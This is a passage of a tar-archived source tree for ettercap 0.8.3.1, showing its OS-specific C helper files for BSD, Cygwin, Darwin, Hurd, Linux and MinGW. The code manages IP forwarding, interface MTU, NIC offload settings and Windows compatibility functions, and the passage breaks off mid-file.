s1->wait_reply = 0; } break; } } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/os/000775 000000 000000 00000000000 13711276346 014672 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/os/ec_bsd.c000664 000000 000000 00000007634 13711276346 016267 0ustar00rootroot000000 000000 /* ettercap -- bsd specific functions This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. $Id$ */ #include #include #include #include #include #include static int saved_status; #ifdef WITH_IPV6 static int saved_status_v6; #endif /*******************************************/ void disable_ip_forward(void) { int mib[4]; int val = 0; size_t len; mib[0] = CTL_NET; mib[1] = PF_INET; mib[2] = IPPROTO_IP; mib[3] = IPCTL_FORWARDING; len = sizeof(saved_status); if( (sysctl(mib, 4, &saved_status, &len, &val, sizeof(val))) == -1) ERROR_MSG("sysctl() | net.inet.ip.forwarding"); DEBUG_MSG("disable_ip_forward | net.inet.ip.forwarding = %d old_value = %d\n", val, saved_status); atexit(restore_ip_forward); atexit(regain_privs_atexit); } void restore_ip_forward(void) { int mib[4]; mib[0] = CTL_NET; mib[1] = PF_INET; mib[2] = IPPROTO_IP; mib[3] = IPCTL_FORWARDING; /* no need to restore anything */ if (saved_status == 0) return; /* restore the old value */ if( (sysctl(mib, 4, NULL, NULL, &saved_status, sizeof(saved_status))) == -1) FATAL_ERROR("Please restore manually the value of net.inet.ip.forwarding to %d", saved_status); DEBUG_MSG("ATEXIT: restore_ip_forward | net.inet.ip.forwarding = %d\n", saved_status); } #ifdef WITH_IPV6 void disable_ipv6_forward(void) { int mib[4]; int val = 0; size_t len; mib[0] = CTL_NET; mib[1] = PF_INET6; mib[2] = IPPROTO_IPV6; mib[3] = IPV6CTL_FORWARDING; len = sizeof(saved_status_v6); if( (sysctl(mib, 4, &saved_status_v6, &len, &val, sizeof(val))) == -1) ERROR_MSG("sysctl() | net.inet6.ip6.forwarding"); DEBUG_MSG("disable_ipv6_forward | net.inet6.ip6.forwarding = %d old_value = %d\n", val, saved_status_v6); atexit(restore_ipv6_forward); } void restore_ipv6_forward(void) { int mib[4]; mib[0] = CTL_NET; mib[1] = PF_INET6; mib[2] = IPPROTO_IPV6; mib[3] = IPV6CTL_FORWARDING; /* no need to restore anything */ if (saved_status_v6 == 0) return; /* restore the old value */ if( (sysctl(mib, 4, NULL, NULL, &saved_status_v6, sizeof(saved_status_v6))) == -1) FATAL_ERROR("Please restore manually the value of net.inet6.ip6.forwarding to %d", saved_status_v6); DEBUG_MSG("ATEXIT: restore_ipv6_forward | net.inet6.ip6.forwarding = %d\n", saved_status_v6); } #endif /* * get the MTU parameter from the interface */ u_int16 get_iface_mtu(const char *iface) { int sock, mtu; struct ifreq ifr; /* open the socket to work on */ sock = socket(PF_INET, SOCK_DGRAM, 0); if (sock == -1) FATAL_ERROR("Unable to open socket on interface for MTU query\n"); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, iface, sizeof(ifr.ifr_name)); /* get the MTU */ if ( ioctl(sock, SIOCGIFMTU, &ifr) < 0) { DEBUG_MSG("get_iface_mtu: MTU FAILED... assuming 1500"); mtu = 1500; } else { DEBUG_MSG("get_iface_mtu: %d", ifr.ifr_mtu); mtu = ifr.ifr_mtu; } close(sock); return mtu; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/os/ec_cygwin.c000664 000000 000000 00000007166 13711276346 017017 0ustar00rootroot000000 000000 /* ettercap -- cygwin specific functions This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include static int saved_status; static HKEY handle; /*******************************************/ void disable_ip_forward(void) { long Status; #ifdef WIN9X DWORD dim = 2; char IpForwardSz[2]; #else DWORD dim = 4; #endif DWORD value = 3; Status = RegOpenKeyEx(HKEY_LOCAL_MACHINE, #ifdef WIN9X TEXT("SYSTEM\\CurrentControlSet\\Services\\VxD\\Mstcp"), #else TEXT("SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters"), #endif 0, KEY_READ|KEY_SET_VALUE, &handle); #ifdef WIN9X Status = RegQueryValueEx(handle, TEXT("EnableRouting"), NULL, NULL, (LPBYTE)IpForwardSz, &dim); value = IpForwardSz[0]-'0'; #else Status = RegQueryValueEx(handle, TEXT("IPEnableRouter"), NULL, NULL, (LPBYTE)&value, &dim); #endif DEBUG_MSG("Inet_DisableForwarding -- previous value %d", (int)value); if (value == 0) { /* if forward is already 0 */ return; } saved_status = value; value = 0; #ifdef WIN9X IpForwardSz[0] = value + '0'; IpForwardSz[1] = '\0'; Status = RegSetValueEx(handle, TEXT("EnableRouting"), 0, REG_SZ, (LPBYTE)IpForwardSz, dim); #else Status = RegSetValueEx(handle, TEXT("IPEnableRouter"), 0, REG_DWORD, (LPBYTE)&value, dim); #endif if (Status != 0) { fprintf(stderr, "\n\nRegSetValueEx() | ERROR %ld\n\n", Status); fprintf(stderr, "Please manually disable ip forwarding\n"); #ifdef WIN9X fprintf(stderr, "set to 0 the HKLM\\SYSTEM\\CurrentControlSet\\Services\\VxD\\Mstcp\\EnableRouting\n\n"); #else fprintf(stderr, "set to 0 the HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter\n\n"); #endif exit(-1); } atexit(restore_ip_forward); atexit(regain_privs_atexit); } void restore_ip_forward(void) { #ifdef WIN9X DWORD dim = 2; char IpForwardSz[2]; #else DWORD dim = 4; #endif /* the handle was already opened in disable_ip_forward */ DEBUG_MSG("ATEXIT: restore_ip_forward: retoring to value %d", saved_status); #ifdef WIN9X IpForwardSz[0] = saved_status + '0'; IpForwardSz[1] = '\0'; RegSetValueEx(handle, TEXT("EnableRouting"), 0, REG_SZ, (LPBYTE)IpForwardSz, dim); #else RegSetValueEx(handle, TEXT("IPEnableRouter"), 0, REG_DWORD, (LPBYTE)&saved_status, dim); #endif RegCloseKey(handle); } #ifdef WITH_IPV6 /* * empty wrapper functions until IPv6 support for Windows */ void disable_ipv6_forward(void) { DEBUG_MSG ("disable_ipv6_forward (no-op)\n"); } void restore_ipv6_forward(void) { DEBUG_MSG ("restore_ipv6_forward (no-op)\n"); } #endif /* * get the MTU parameter from the interface */ u_int16 get_iface_mtu(const char *iface) { int mtu = 1500; NOT_IMPLEMENTED(); return mtu; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/os/ec_darwin.c000664 000000 000000 00000007647 13711276346 017007 0ustar00rootroot000000 000000 /* ettercap -- darwin specific functions This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include static int saved_status; #ifdef WITH_IPV6 static int saved_status_v6; #endif /*******************************************/ void disable_ip_forward(void) { int mib[4]; int val = 0; size_t len; mib[0] = CTL_NET; mib[1] = PF_INET; mib[2] = IPPROTO_IP; mib[3] = IPCTL_FORWARDING; len = sizeof(saved_status); if( (sysctl(mib, 4, &saved_status, &len, &val, sizeof(val))) == -1) ERROR_MSG("sysctl() | net.inet.ip.forwarding"); DEBUG_MSG("disable_ip_forward | net.inet.ip.forwarding = %d old_value = %d\n", val, saved_status); atexit(restore_ip_forward); atexit(regain_privs_atexit); } void restore_ip_forward(void) { int mib[4]; mib[0] = CTL_NET; mib[1] = PF_INET; mib[2] = IPPROTO_IP; mib[3] = IPCTL_FORWARDING; /* no need to restore anything */ if (saved_status == 0) return; /* restore the old value */ if( (sysctl(mib, 4, NULL, NULL, &saved_status, sizeof(saved_status))) == -1) FATAL_ERROR("Please restore manually the value of net.inet.ip.forwarding to %d", saved_status); DEBUG_MSG("ATEXIT: restore_ip_forward | net.inet.ip.forwarding = %d\n", saved_status); } #ifdef WITH_IPV6 void disable_ipv6_forward(void) { int mib[4]; int val = 0; size_t len; mib[0] = CTL_NET; mib[1] = PF_INET6; mib[2] = IPPROTO_IPV6; mib[3] = IPV6CTL_FORWARDING; len = sizeof(saved_status_v6); if( (sysctl(mib, 4, &saved_status_v6, &len, &val, sizeof(val))) == -1) ERROR_MSG("sysctl() | net.inet6.ip6.forwarding"); DEBUG_MSG("disable_ipv6_forward | net.inet6.ip6.forwarding = %d old_value = %d\n", val, saved_status_v6); atexit(restore_ipv6_forward); } void restore_ipv6_forward(void) { int mib[4]; mib[0] = CTL_NET; mib[1] = PF_INET6; mib[2] = IPPROTO_IPV6; mib[3] = IPV6CTL_FORWARDING; /* no need to restore anything */ if (saved_status_v6 == 0) return; /* restore the old value */ if( (sysctl(mib, 4, NULL, NULL, &saved_status_v6, sizeof(saved_status_v6))) == -1) FATAL_ERROR("Please restore manually the value of net.inet6.ip6.forwarding to %d", saved_status_v6); DEBUG_MSG("ATEXIT: restore_ipv6_forward | net.inet6.ip6.forwarding = %d\n", saved_status_v6); } #endif /* * get the MTU parameter from the interface */ u_int16 get_iface_mtu(const char *iface) { int sock, mtu; struct ifreq ifr; /* open the socket to work on */ sock = socket(PF_INET, SOCK_DGRAM, 0); if (sock == -1) FATAL_ERROR("Unable to open socket on interface for MTU query\n"); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, iface, sizeof(ifr.ifr_name)); /* get the MTU */ if ( ioctl(sock, SIOCGIFMTU, &ifr) < 0) { DEBUG_MSG("get_iface_mtu: MTU FAILED... assuming 1500"); mtu = 1500; } else { DEBUG_MSG("get_iface_mtu: %d", ifr.ifr_mtu); mtu = ifr.ifr_mtu; } close(sock); return mtu; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/os/ec_dummy.c000664 000000 000000 00000001555 13711276346 016646 0ustar00rootroot000000 000000 /* ettercap -- dummy module, only a workaround for Makefile.am This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /*******************************************/ /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/os/ec_gnu.c000664 000000 000000 00000003207 13711276346 016300 0ustar00rootroot000000 000000 /* ettercap -- GNU hurd specific functions This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ /* XXX GNU/hurd seems to be NOT supported at this point See https://github.com/Ettercap/ettercap/issues/151 http://www.mail-archive.com/debian-hurd@lists.debian.org/msg21345.html These functions are just "stubs" to allow the package build for hurd patches are welcome! */ #include void disable_interface_offload(void); /*******************************************/ void disable_ip_forward(void) { DEBUG_MSG ("disable_ip_forward (no-op)\n"); } void restore_ip_forward(void) { DEBUG_MSG ("restore_ip_forward (no-op)\n"); } #ifdef WITH_IPV6 void disable_ipv6_forward(void) { DEBUG_MSG ("disable_ipv6_forward (no-op)\n"); } void restore_ipv6_forward(void) { DEBUG_MSG ("restore_ipv6_forward (no-op)\n"); } #endif u_int16 get_iface_mtu(const char *iface) { (void) iface; return 0; } void disable_interface_offload(void) { } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/os/ec_linux.c000664 000000 000000 00000023611 13711276346 016647 0ustar00rootroot000000 000000 /* ettercap -- linux specific functions This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* the old value */ static char saved_status; #ifdef WITH_IPV6 static char saved_status_v6_global, saved_status_v6_iface; #endif /* protos */ /*******************************************/ void disable_ip_forward(void) { FILE *fd; fd = fopen("/proc/sys/net/ipv4/ip_forward", "r"); ON_ERROR(fd, NULL, "failed to open /proc/sys/net/ipv4/ip_forward"); fscanf(fd, "%c", &saved_status); fclose(fd); DEBUG_MSG("disable_ip_forward: old value = %c", saved_status); fd = fopen("/proc/sys/net/ipv4/ip_forward", "w"); ON_ERROR(fd, NULL, "failed to open /proc/sys/net/ipv4/ip_forward"); fprintf(fd, "0"); fclose(fd); atexit(restore_ip_forward); atexit(regain_privs_atexit); } void restore_ip_forward(void) { FILE *fd; char current_status; /* no modification needed */ if (saved_status == '0') return; if (getuid()) { DEBUG_MSG("ATEXIT: restore_ip_forward: cannot restore ip_forward " "since the privileges have been dropped to non root\n"); FATAL_ERROR("ip_forwarding was disabled, but we cannot re-enable it now.\n" "remember to re-enable it manually\n"); return; } fd = fopen("/proc/sys/net/ipv4/ip_forward", "r"); ON_ERROR(fd, NULL, "failed to open /proc/sys/net/ipv4/ip_forward"); fscanf(fd, "%c", ¤t_status); fclose(fd); DEBUG_MSG("ATEXIT: restore_ip_forward: curr: %c saved: %c", current_status, saved_status); if (current_status == saved_status) { DEBUG_MSG("ATEXIT: restore_ip_forward: does not need restoration"); return; } fd = fopen("/proc/sys/net/ipv4/ip_forward", "w"); if (fd == NULL) { FATAL_ERROR("ip_forwarding was disabled, but we cannot re-enable it now.\n" "remember to re-enable it manually\n"); return; } fprintf(fd, "%c", saved_status); fclose(fd); DEBUG_MSG("ATEXIT: restore_ip_forward: restore to %c", saved_status); } #ifdef WITH_IPV6 void disable_ipv6_forward(void) { FILE *fd; char fpath_global[] = "/proc/sys/net/ipv6/conf/all/forwarding"; char fpath_iface[64]; /* global configuration */ fd = fopen(fpath_global, "r"); ON_ERROR(fd, NULL, "failed to open %s", fpath_global); fscanf(fd, "%c", &saved_status_v6_global); fclose(fd); /* interface specific configuration */ snprintf(fpath_iface, 63, "/proc/sys/net/ipv6/conf/%s/forwarding", EC_GBL_OPTIONS->iface); fd = fopen(fpath_iface, "r"); ON_ERROR(fd, NULL, "failed to open %s", fpath_iface); fscanf(fd, "%c", &saved_status_v6_iface); fclose(fd); fd = fopen(fpath_global, "w"); ON_ERROR(fd, NULL, "failed to open %s", fpath_global); fprintf(fd, "0"); fclose(fd); fd = fopen(fpath_iface, "w"); ON_ERROR(fd, NULL, "failed to open %s", fpath_iface); fprintf(fd, "0"); fclose(fd); DEBUG_MSG("disable_ipv6_forward: old value = %c/%c (global/interface %s)", saved_status_v6_global, saved_status_v6_iface, EC_GBL_OPTIONS->iface); atexit(restore_ipv6_forward); } void restore_ipv6_forward(void) { FILE *fd; char current_status_global, current_status_iface; char fpath_global[] = "/proc/sys/net/ipv6/conf/all/forwarding"; char fpath_iface[64]; /* no modification needed */ if (saved_status_v6_global == '0' && saved_status_v6_iface == '0') return; if (getuid()) { DEBUG_MSG("ATEXIT: restore_ipv6_forward: cannot restore ipv6_forward " "since the privileges have been dropped to non root\n"); FATAL_ERROR("ipv6_forwarding was disabled, but we cannot re-enable it now.\n" "remember to re-enable it manually\n"); return; } /* global configuration */ fd = fopen(fpath_global, "r"); ON_ERROR(fd, NULL, "failed to open %s", fpath_global); fscanf(fd, "%c", ¤t_status_global); fclose(fd); /* interface specific configuration */ snprintf(fpath_iface, 63, "/proc/sys/net/ipv6/conf/%s/forwarding", EC_GBL_OPTIONS->iface); fd = fopen(fpath_iface, "r"); ON_ERROR(fd, NULL, "failed to open %s", fpath_iface); fscanf(fd, "%c", ¤t_status_iface); fclose(fd); DEBUG_MSG("ATEXIT: restore_ipv6_forward: curr: %c/%c saved: %c/%c (global/interface %s)", current_status_global, current_status_iface, saved_status_v6_global, saved_status_v6_iface, EC_GBL_OPTIONS->iface); if (current_status_global == saved_status_v6_global && current_status_iface == saved_status_v6_iface) { DEBUG_MSG("ATEXIT: restore_ipv6_forward: does not need restoration"); return; } /* write back global configuration */ if ((fd = fopen(fpath_global, "w")) != NULL) { fprintf(fd, "%c", saved_status_v6_global); fclose(fd); DEBUG_MSG("ATEXIT: restore_ipv6_forward: restore global to %c", saved_status_v6_global); } else { FATAL_ERROR("global ipv6_forwarding was disabled, but we cannot re-enable it now.\n" "remember to re-enable it manually\n"); } /* write back interface specific configuration */ if ((fd = fopen(fpath_iface, "w")) != NULL) { fprintf(fd, "%c", saved_status_v6_iface); fclose(fd); DEBUG_MSG("ATEXIT: restore_ipv6_forward: restore %s to %c", EC_GBL_OPTIONS->iface, saved_status_v6_iface); } else { FATAL_ERROR("interface ipv6_forwarding was disabled, but we cannot re-enable it now.\n" "remember to re-enable it manually\n"); } } #endif /* * get the MTU parameter from the interface */ u_int16 get_iface_mtu(const char *iface) { int sock, mtu; struct ifreq ifr; /* open the socket to work on */ sock = socket(PF_INET, SOCK_DGRAM, 0); if (sock == -1) /* unable to bind to socket, kaboom */ FATAL_ERROR("Unable to open socket on interface for MTU query\n"); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, iface, sizeof(ifr.ifr_name)); /* get the MTU */ if ( ioctl(sock, SIOCGIFMTU, &ifr) < 0) { DEBUG_MSG("get_iface_mtu: MTU FAILED... assuming 1500"); mtu = 1500; } else { DEBUG_MSG("get_iface_mtu: %d", ifr.ifr_mtu); mtu = ifr.ifr_mtu; } close(sock); return mtu; } /* * disable segmentation offload on interface * this prevents L3 send errors (payload too large) */ void disable_interface_offload(void) { int param_length= 0; char *command; char **param = NULL; char *p; int ret_val, i = 0; SAFE_CALLOC(command, 100, sizeof(char)); BUG_IF(command==NULL); memset(command, '\0', 100); snprintf(command, 99, "ethtool -K %s tso off gso off gro off lro off", EC_GBL_OPTIONS->iface); DEBUG_MSG("disable_interface_offload: Disabling offload on %s", EC_GBL_OPTIONS->iface); for(p = strsep(&command, " "); p != NULL; p = strsep(&command, " ")) { SAFE_REALLOC(param, (i+1) * sizeof(char *)); param[i++] = strdup(p); } SAFE_REALLOC(param, (i+1) * sizeof(char *)); param[i] = NULL; param_length= i + 1; //because there is a SAFE_REALLOC after the for. switch(fork()) { case 0: #ifndef DEBUG /* don't print on console if the ethtool cannot disable some offloads unless you are in debug mode */ close(2); #endif execvp(param[0], param); WARN_MSG("cannot disable offload on %s, do you have ethtool installed?", EC_GBL_OPTIONS->iface); safe_free_mem(param, ¶m_length, command); _exit(-E_INVALID); case -1: safe_free_mem(param, ¶m_length, command); break; default: safe_free_mem(param, ¶m_length, command); wait(&ret_val); } } #ifdef WITH_IPV6 /* * if privacy extension for IPv6 is enabled, under certain * circumstances, an IPv6 socket can not be written exiting with * code -1 bytes written (Cannot assign requested address). * see pull request #245.(https://github.com/Ettercap/ettercap/pull/245) * * this usually happens after returning from hibernation * therefore we should warn users. * * however investigation of the root cause continues but as long as * it isn't identified and fixed, this function is being kept. */ void check_tempaddr(const char *iface) { FILE *fd; int mode_global, mode_iface; char fpath_global[] = "/proc/sys/net/ipv6/conf/all/use_tempaddr"; char fpath_iface[64]; snprintf(fpath_iface, 63, "/proc/sys/net/ipv6/conf/%s/use_tempaddr", iface); fd = fopen(fpath_global, "r"); ON_ERROR(fd, NULL, "failed to open %s", fpath_global); mode_global = fgetc(fd); ON_ERROR(mode_global, EOF, "failed to read value from %s", fpath_global); fclose(fd); DEBUG_MSG("check_tempaddr: %s = %c", fpath_global, mode_global); fd = fopen(fpath_iface, "r"); ON_ERROR(fd, NULL, "failed to open %s", fpath_iface); mode_iface = fgetc(fd); ON_ERROR(mode_iface, EOF, "failed to read value from %s", fpath_iface); fclose(fd); DEBUG_MSG("check_tempaddr: %s = %c", fpath_iface, mode_iface); if (mode_global != '0') USER_MSG("Ettercap might not work correctly. %s is not set to 0.\n", fpath_global); if (mode_iface != '0') USER_MSG("Ettercap might not work correctly. %s is not set to 0.\n", fpath_iface); } #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/os/ec_mingw.c000664 000000 000000 00000067222 13711276346 016637 0ustar00rootroot000000 000000 /* ettercap -- mingw specific functions This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. Various functions needed for native Windows compilers (not CygWin I guess??) We export these (for the plugins) with a "ec_win_" prefix in order not to accidentally link with other symbols in some foreign lib. Copyright (C) G. Vanem 2003 */ #include #include #include #include #include #include #include #include #ifndef WPCAP #define WPCAP /* makes include */ #endif #include #include #include HANDLE pcap_getevent(pcap_t *p); #if defined(HAVE_NCURSES) && !defined(BUILDING_UTILS) #include #include extern bool trace_on; /* From */ extern int PDC_check_bios_key (void); extern void PDC_debug (char*, ...); #endif #ifndef __inline #define __inline #endif /* Most of this is *not* MingW specific, but Ettercap requires gcc */ #ifndef __GNUC__ #error "You must be joking" #endif #ifndef ATTACH_PARENT_PROCESS #define ATTACH_PARENT_PROCESS ((DWORD)-1) #endif static void setup_console(void); static void pdc_ncurses_init(void); static void __attribute__((destructor)) exit_console (void); static BOOL has_console; static BOOL started_from_a_gui; static BOOL attached_to_console; /***************************************/ static void __init win_init(void) { /* Dr MingW JIT */ LoadLibrary ("exchndl.dll"); setup_console(); pdc_ncurses_init(); } /* * Ask NDIS for the device MTU */ #ifndef OID_GEN_MAXIMUM_TOTAL_SIZE #define OID_GEN_MAXIMUM_TOTAL_SIZE 0x00010111 #endif static BOOL get_interface_mtu (ADAPTER *adapter, DWORD *mtu) { struct { PACKET_OID_DATA oidData; DWORD mtu; } oid; memset (&oid, 0, sizeof(oid)); oid.oidData.Oid = OID_GEN_MAXIMUM_TOTAL_SIZE; oid.oidData.Length = sizeof(oid); if (!PacketRequest(adapter, FALSE, &oid.oidData)) return (FALSE); *mtu = *(DWORD*) &oid.oidData.Data; return (TRUE); } u_int16 get_iface_mtu(const char *iface) { if (iface) { ADAPTER *adapter; DWORD mtu = 0; adapter = PacketOpenAdapter ((PCHAR)iface); if (adapter) { BOOL rc = get_interface_mtu (adapter, &mtu); DEBUG_MSG("get_interface_mtu(): mtu %lu, %s", mtu, rc ? "okay" : "failed"); PacketCloseAdapter (adapter); if (rc & mtu) return (mtu); } else DEBUG_MSG("get_interface_mtu(): failed to open iface \"%s\"; %s", iface, ec_win_strerror(GetLastError())); } return (1514); /* Assume ethernet */ } void disable_ip_forward(void) { DEBUG_MSG ("disable_ip_forward (no-op)\n"); } void restore_ip_forward(void) { DEBUG_MSG ("restore_ip_forward (no-op)\n"); } #ifdef WITH_IPV6 void disable_ipv6_forward(void) { DEBUG_MSG ("disable_ipv6_forward (no-op)\n"); } void restore_ipv6_forward(void) { DEBUG_MSG ("restore_ipv6_forward (no-op)\n"); } #endif /* * Get and set the read-event associated with the pcap handle. This * causes pcap_loop() to terminate (ReadFile hopefully returns 0). * Note: this function is called outside the capture thread, so take * care not to modify the pcap_handle in any way. */ int ec_win_pcap_stop (const void *pcap_handle) { static CRITICAL_SECTION crit; HANDLE hnd = pcap_getevent ((pcap_t*)pcap_handle); BOOL rc; DWORD err; DEBUG_MSG("%s: signalling pcap to stop...", __FUNCTION__); if (!hnd) { DEBUG_MSG("no event-handle!?\n"); return (0); } InitializeCriticalSection (&crit); EnterCriticalSection (&crit); rc = SetEvent (hnd); err = !rc ? GetLastError() : 0UL; LeaveCriticalSection (&crit); DEBUG_MSG("rc %d, %s\n", rc, ec_win_strerror(err)); return (1); } /* * No fork() in Windows, just beep */ void set_daemon_interface (void) { _putch ('\a'); } int ec_win_gettimeofday (struct timeval *tv, struct timezone *tz) { struct _timeb tb; if (!tv && !tz) { errno = EINVAL; return (-1); } _ftime (&tb); if (tv) { tv->tv_sec = tb.time; tv->tv_usec = MILLI2MICRO(tb.millitm); } if (tz) { tz->tz_minuteswest = tb.timezone; tz->tz_dsttime = tb.dstflag; } return (0); } /* * Use PDcurses' keyboard checker if it's initialised. */ static int __inline win_kbhit (void) { #if defined(HAVE_NCURSES) && !defined(BUILDING_UTILS) if ((current_screen.flags & WDG_SCR_INITIALIZED)) return PDC_check_bios_key(); #endif return _kbhit(); } /* * A poll() using select() */ int ec_win_poll (struct pollfd *p, int num, int timeout) { struct timeval tv; int i, n, ret, num_fd = (num + sizeof(fd_set)-1) / sizeof(fd_set); fd_set read [num_fd]; fd_set write [num_fd]; fd_set excpt [num_fd]; FD_ZERO (&read); FD_ZERO (&write); FD_ZERO (&excpt); n = -1; for (i = 0; i < num; i++) { if (p[i].fd < 0) continue; if ((p[i].events & POLLIN) && i != STDIN_FILENO) FD_SET (p[i].fd, &read[0]); if ((p[i].events & POLLOUT) && i != STDOUT_FILENO) FD_SET (p[i].fd, &write[0]); if (p[i].events & POLLERR) FD_SET (p[i].fd, &excpt[0]); if (p[i].fd > n) n = p[i].fd; } if (n == -1) return (0); if (timeout < 0) ret = select (n+1, &read[0], &write[0], &excpt[0], NULL); else { tv.tv_sec = MILLI2SEC(timeout); tv.tv_usec = MILLI2MICRO((timeout % 1000)); ret = select (n+1, &read[0], &write[0], &excpt[0], &tv); } for (i = 0; ret >= 0 && i < num; i++) { p[i].revents = 0; if (FD_ISSET (p[i].fd, &read[0])) p[i].revents |= POLLIN; if (FD_ISSET (p[i].fd, &write[0])) p[i].revents |= POLLOUT; if (FD_ISSET (p[i].fd, &excpt[0])) p[i].revents |= POLLERR; } if ((p[STDIN_FILENO].events & POLLIN) && num >= STDIN_FILENO && win_kbhit()) { p [STDIN_FILENO].revents = POLLIN; ret++; } if ((p[STDOUT_FILENO].events & POLLOUT) && num >= STDOUT_FILENO && isatty(STDOUT_FILENO) >= 0) { p [STDOUT_FILENO].revents = POLLOUT; ret++; } return (ret); } /* * For consistent and nice looks, replace '\\' with '/'. * Replace trailing '//' with '/'. * All (?) Windows core functions and libc handles this fine. */ static char *slashify (char *path) { char *p; for (p = strchr(path,'\\'); p && *p; p = strchr(p,'\\')) *p++ = '/'; if (p >= path+2 && *p == '\0' && p[-1] == '/' && p[-2] == '/') *(--p) = '\0'; return (path); } /* * Return current user's home directory. Try: * - %HOME% * - %APPDATA% * - %USERPROFILE%\\Application Data * - else EC's dir. * * Not used yet. */ const char *ec_win_get_user_dir (void) { static char path[PATH_MAX] = ""; char *home; if (path[0]) return (path); home = getenv ("HOME"); if (home) strncpy (path, home, sizeof(path)-1); else { home = getenv ("APPDATA"); /* Win-9x/ME */ if (home) strncpy (path, home, sizeof(path)-1); else { home = getenv ("USERPROFILE"); /* Win-2K/XP */ if (home) snprintf (path, sizeof(path)-1, "%s\\Application Data", home); else strncpy (path, ec_win_get_ec_dir(), sizeof(path)-1); } } path [sizeof(path)-1] = '\0'; return slashify (path); } /* * Return directory of running program. */ const char *ec_win_get_ec_dir (void) { static char path[PATH_MAX] = "c:\\"; char *slash; if (GetModuleFileName(NULL,path,sizeof(path)) && (slash = strrchr(path,'\\')) != NULL) *slash = '\0'; return slashify (path); } /* * Return name of a signal */ const char *ec_win_strsignal (int signo) { static char buf [20]; switch (signo) { case 0: return ("None"); #ifdef SIGINT case SIGINT: return ("SIGINT"); #endif #ifdef SIGABRT case SIGABRT: return ("SIGABRT"); #endif #ifdef SIGFPE case SIGFPE: return ("SIGFPE"); #endif #ifdef SIGILL case SIGILL: return ("SIGILL"); #endif #ifdef SIGSEGV case SIGSEGV: return ("SIGSEGV"); #endif #ifdef SIGTERM case SIGTERM: return ("SIGTERM"); #endif #ifdef SIGALRM case SIGALRM: return ("SIGALRM"); #endif #ifdef SIGHUP case SIGHUP: return ("SIGHUP"); #endif #ifdef SIGKILL case SIGKILL: return ("SIGKILL"); #endif #ifdef SIGPIPE case SIGPIPE: return ("SIGPIPE"); #endif #ifdef SIGQUIT case SIGQUIT: return ("SIGQUIT"); #endif #ifdef SIGUSR1 case SIGUSR1: return ("SIGUSR1"); #endif #ifdef SIGUSR2 case SIGUSR2: return ("SIGUSR2"); #endif #ifdef SIGUSR3 case SIGUSR3: return ("SIGUSR3"); #endif #ifdef SIGNOFP case SIGNOFP: return ("SIGNOFP"); #endif #ifdef SIGTRAP case SIGTRAP: return ("SIGTRAP"); #endif #ifdef SIGTIMR case SIGTIMR: return ("SIGTIMR"); #endif #ifdef 